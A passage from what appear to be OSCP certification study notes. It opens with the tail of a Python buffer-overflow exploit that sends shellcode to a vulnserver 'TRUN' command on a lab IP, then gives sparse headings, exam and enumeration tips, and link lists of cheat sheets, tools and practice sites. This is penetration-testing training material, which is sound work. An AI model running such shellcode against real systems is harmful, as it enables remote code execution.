12 "\x50\x93\x73\xe1\x69\x5c\x86\xe0\xae\x81\x6b\xb0\x67\xcd\xde"
13 "\x24\x03\x9b\xe2\xcf\x5f\x0d\x63\x2c\x17\x2c\x42\xe3\x23\x77"
14 "\x44\x02\xe7\x03\xcd\x1c\xe4\x2e\x87\x97\xde\xc5\x16\x71\x2f"
15 "\x25\xb4\xbc\x9f\xd4\xc4\xf9\x18\x07\xb3\xf3\x5a\xba\xc4\xc0"
Link_Matters
16 "\x21\x60\x40\xd2\x82\xe3\xf2\x3e\x32\x27\x64\xb5\x38\x8c\xe2"
17 "\x91\x5c\x13\x26\xaa\x59\x98\xc9\x7c\xe8\xda\xed\x58\xb0\xb9"
18 "\x8c\xf9\x1c\x6f\xb0\x19\xff\xd0\x14\x52\x12\x04\x25\x39\x7b"
19 "\xe9\x04\xc1\x7b\x65\x1e\xb2\x49\x2a\xb4\x5c\xe2\xa3\x12\x9b"
20 "\x05\x9e\xe3\x33\xf8\x21\x14\x1a\x3f\x75\x44\x34\x96\xf6\x0f"
21 "\xc4\x17\x23\x9f\x94\xb7\x9c\x60\x44\x78\x4d\x09\x8e\x77\xb2"
22 "\x29\xb1\x5d\xdb\xc0\x48\x36\xee\x14\x52\x94\x86\x16\x52\x09"
23 "\x0b\x9e\xb4\x43\xa3\xf6\x6f\xfc\x5a\x53\xfb\x9d\xa3\x49\x86"
24 "\x9e\x28\x7e\x77\x50\xd9\x0b\x6b\x05\x29\x46\xd1\x80\x36\x7c"
25 "\x7d\x4e\xa4\x1b\x7d\x19\xd5\xb3\x2a\x4e\x2b\xca\xbe\x62\x12"
26 "\x64\xdc\x7e\xc2\x4f\x64\xa5\x37\x51\x65\x28\x03\x75\x75\xf4"
27 "\x8c\x31\x21\xa8\xda\xef\x9f\x0e\xb5\x41\x49\xd9\x6a\x08\x1d"
28 "\x9c\x40\x8b\x5b\xa1\x8c\x7d\x83\x10\x79\x38\xbc\x9d\xed\xcc"
29 "\xc5\xc3\x8d\x33\x1c\x40\xad\xd1\xb4\xbd\x46\x4c\x5d\x7c\x0b"
30 "\x6f\x88\x43\x32\xec\x38\x3c\xc1\xec\x49\x39\x8d\xaa\xa2\x33"
31 "\x9e\x5e\xc4\xe0\x9f\x4a")
32
33 shellcode = 'A' * 2003 + "\xaf\x11\x50\x62" + '\x90' * 32 + overflow
34
35 try:
36 s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
37 s.connect(('10.0.0.71', 9999))
38 s.send('TRUN /.:/' + shellcode)
39 s.close()
40 except:
41
42 print('Error connecting to server')
43 sys.exit()
Link_Matters
Binary
Linux BOF :
SLmail
ftpfreefloat
minishare
Ftpfreefloat
Tools :
Link_Matters
Misc
SSH Permissions
Link_Matters
Msfvenom
MSF Venom Payloads
PHP
Linux Elf
Link_Matters
Tips
Preparation Tips :
You’ll run out of techniques before time runs out. So learn as many techniques as
possible that you always have an alternate option if something fails to produce output.
Try harder doesn’t mean you have to try the same exploit with 200x thread count or with
an angry face. Go, enumerate harder.
Exam Tips :
Bruh you have unlimited breaks, use it. You aren’t writing your semester exam.
24 reverts are plenty enough already. Go use it.
Caffeine is a must.
You’re not gonna pentest a real-world machine. You’re gonna try to hack into an
intentionally vulnerable machine that is vulnerable to a specific exploit. Exploiting it
right in 24 hours is your only goal. So, OSCP is actually a lot easier than real-world
machines where you don’t know if the machine is vulnerable or not.
ippsec.rocks is a good resource to use if you need help in exploiting a specific service
Scan ports, scan all the ports, scan using different scanning techniques,
brute force web dirs, brute force web dirs using different wordlist and tools
check for file permissions, check for registry entries, check for writable folders, check for
privileged processes and services, check for interesting files,
look for a more suitable exploit using searchsploit, search google for valuable
information, etc.
webserver version, web app version, CMS version, plugin versions
Password reuse
Link_Matters
The default password of the application / CMS
Guess the file location incase of LFI with username
username from any notes inside the machine might be useful for Bruteforce
Try harder doesn’t mean you have to try the same exploit with 200x thread count or with
an angry face. Go, enumerate harder.
Link_Matters
Resources
OSCP Journeys and Preparation guides:
https://medium.com/@parthdeshani/how-to-pass-oscp-like-boss-b269f2ea99d
https://www.netsecfocus.com/oscp/2019/03/29/The_Journey_to_Try_Harder-
_TJNulls_Preparation_Guide_for_PWK_OSCP.html
https://medium.com/@calmhavoc/oscp-the-pain-the-pleasure-a506962baad
https://github.com/burntmybagel/OSCP-Prep
https://medium.com/@m4lv0id/and-i-did-oscp-589babbfea19
https://gr0sabi.github.io/security/oscp-insights-best-practices-resources/#note-taking
https://satiex.net/2019/04/10/offensive-security-certified-professional/amp/?
__twitter_impression=true
https://hakin9.org/try-harder-my-penetration-testing-with-kali-linux-oscp-review-and-
courselab-experience-my-oscp-review-by-jason-bernier/
https://theslickgeek.com/oscp/
http://dann.com.br/oscp-offensive-security-certification-pwk-course-review/
https://h0mbre.github.io/OSCP/#
https://prasannakumar.in/infosec/my-walk-towards-cracking-oscp/
https://infosecuritygeek.com/my-oscp-journey/
https://acknak.fr/en/articles/oscp-tools/
https://r3dg33k.com/2018-10-09-oscp-exp/
https://www.jimwilbur.com/oscp-links/
https://www.linkedin.com/pulse/road-oscp-oluwaseun-oyelude-oscp
https://scund00r.com/all/oscp/2018/02/25/passing-oscp.html
https://blog.vonhewitt.com/2018/08/oscp-exam-cram-log-aug-sept-oct-2018/
https://jhalon.github.io/OSCP-Review/
https://www.alienvault.com/blogs/security-essentials/how-to-prepare-to-take-the-oscp
https://niiconsulting.com/checkmate/2017/06/a-detail-guide-on-oscp-preparation-
from-newbie-to-oscp/
https://thor-sec.com/review/oscp/oscp_review/
Link_Matters
Cheatsheets
OSCP Cheatsheets :
https://github.com/P3t3rp4rk3r/OSCP-cheat-sheet-1?files=1
https://github.com/crsftw/oscp?files=1
https://github.com/crsftw
https://h4ck.co/wp-content/uploads/2018/06/cheatsheet.txt
https://sushant747.gitbooks.io/total-oscp-guide/reverse-shell.html
https://jok3rsecurity.com/cheat-sheet/
https://github.com/UserXGnu/OSCP-cheat-sheet-1?files=1
https://archive.is/IZLjv
https://highon.coffee/blog/penetration-testing-tools-cheat-sheet/
http://ramunix.blogspot.com/2016/10/oscp-cheat-sheet.html?m=1
http://0xc0ffee.io/blog/OSCP-Goldmine
https://hausec.com/pentesting-cheatsheet/
https://jordanpotti.com/oscp/
https://github.com/ucki/URP-T-v.01?files=1
https://blog.propriacausa.de/wp-content/uploads/2016/07/oscp_notes.html
https://zsahi.wordpress.com/oscp-notes-collection/
https://github.com/weaknetlabs/Penetration-Testing-Grimoire?files=1
https://github.com/OlivierLaflamme/Cheatsheet-God?files=1
https://medium.com/@cymtrick/oscp-cheat-sheet-5b8aeae085ad
Link_Matters
Tools
Approved Tools List: https://falconspy.medium.com/unofficial-oscp-approved-tools-
b2b4e889e707
Exploit search :
Searchsploit
Enumeration Tools :
https://github.com/Tib3rius/AutoRecon
https://bitbucket.org/xaeroborg/python3-programs/src
https://github.com/21y4d/nmapAutomator
Powershell:
EXE : (https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#exe)
Link_Matters
WinPeas [ https://github.com/carlospolop/privilege-escalation-awesome-scripts-
suite/tree/master/winPEAS ]
Accesschk.exe
[https://github.com/jivoi/pentest/blob/master/post_win/accesschk_exe]
PowerUp (https://github.com/PowerShellMafia/PowerSploit/tree/master/Privesc)
Seatbelt (https://github.com/carlospolop/winPE/tree/master/binaries/seatbelt)
Note Taking
Link_Matters
Practice
OSCP Like VMs:
Practice Arena:
Link_Matters
CMD Challenge https://cmdchallenge.com
Try Hack Me https://tryhackme.com/
Hacking-Lab https://www.hacking-lab.com/index.html
PWNABLE https://pwnable.kr/play.php
Google CTF https://capturetheflag.withgoogle.com/
ImmersiveLabs https://immersivelabs.com/
Attack-Defense https://attackdefense.com/
OverTheWire http://overthewire.org
SANS Challenger https://www.holidayhackchallenge.com/
SmashTheStack http://smashthestack.org/wargames.html
https://microcorruption.com/login (Very good interactive interface, introduces low-level
reverse engineering in an MSP430)
https://learn.abctf.xyz (New platform for learning CTF, with challenges created by the
users themselves)
http://reversing.kr/
http://hax.tor.hu/
https://pwn0.com/
https://io.netgarage.org/
http://ringzer0team.com/
http://www.hellboundhackers.org/
http://counterhack.net/Counter_Hack/Challenges.html
http://www.hackthissite.org/
Others
https://backdoor.sdslabs.co/
http://smashthestack.org/wargames.html
http://hackthecause.info/
http://bright-shadows.net/
http://www.mod-x.co.uk/main.php
http://scanme.nmap.org/
Link_Matters
http://www.hackertest.net/
http://net-force.nl/
http://securityoverride.org/ It teaches good concepts, but some things are not realistic (like
stored strings identical to the input)
http://demo.testfire.net/
http://wocares.com/xsstester.php
http://crackme.cenzic.com/
http://test.acunetix.com/
http://zero.webappsecurity.com/
http://computer-forensics.sans.org/community/challenges
http://computer-forensics.sans.org/community/challenges
http://forensicscontest.com/
Recruiting
https://www.praetorian.com/challenges/pwnable/
Link_Matters
http://rtncyberjobs.com/
http://0x41414141.com/
Paid Training
http://heorot.net/
http://www.badstore.net/
http://www.owasp.org/index.php/Category:OWASP_WebGoat_Project
http://www.owasp.org/index.php/Owasp_SiteGenerator
http://www.irongeek.com/i.php?page=security/mutillidae-deliberately-vulnerable-php-
owasp-top-10
https://pentesterlab.com/exercises/
http://sourceforge.net/projects/metasploitable/files/Metasploitable2/
Link_Matters